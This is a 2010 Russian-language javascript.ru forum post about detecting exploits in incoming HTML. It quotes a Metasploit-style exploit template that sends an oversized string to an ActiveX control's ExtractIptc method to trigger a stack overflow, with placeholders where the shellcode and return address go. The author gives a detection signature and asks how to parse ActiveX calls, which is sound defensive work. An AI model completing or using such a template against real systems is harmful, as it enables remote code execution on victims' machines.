Javascript-форум (https://javascript.ru/forum/)
-   Общие вопросы Javascript (https://javascript.ru/forum/misc/)
-   -   парсим приходящие HTML для борьбы с эксплоитами (https://javascript.ru/forum/misc/7913-parsim-prikhodyashhie-html-dlya-borby-s-ehksploitami.html)

donkombat 25.02.2010 17:34

парсим приходящие HTML для борьбы с эксплоитами
 
Всем добрый день!
Например есть эксплоит, который создает html страницу:

<html>
<object classid='clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0' id='#{vname}'></object>
<script language='javascript'>
#{rand1} = unescape('#{filler}');
while (#{rand1}.length <= 261) #{rand1} = #{rand1} + unescape('#{filler}');
#{rand2} = unescape('#{jmp}');
#{rand3} = unescape('#{ret}');
#{rand4} = unescape('#{sc}');
#{strname} = #{rand1} + #{rand2} + #{rand3} + #{rand4};
#{vname}.ExtractIptc = #{strname};
</script>
</html>


Уязвимость в том, что ExtractIptc получает очень большое значение и возникает переполнение стека. Сигнатура будет выглядеть следующим образом: если методу ExtractIptc, объекта класса 5C6698D9-7BE4-4122-8EC5-291D84DBD4A0 передается параметр большого размера, то это можно считать атакой!!!
Перед отображением в браузере этой страницы можно проверять и детектировать атаки но прямой парсинг несет некоторые сложности.
Хочу спросить у вас: имеется ли технология, позволяющая просто получить из html список ActiveX, которые он будет подгружать + список методов этих ActiveX с параметрами, с которыми они будут вызываться?


Часовой пояс GMT +3, время: 23:28.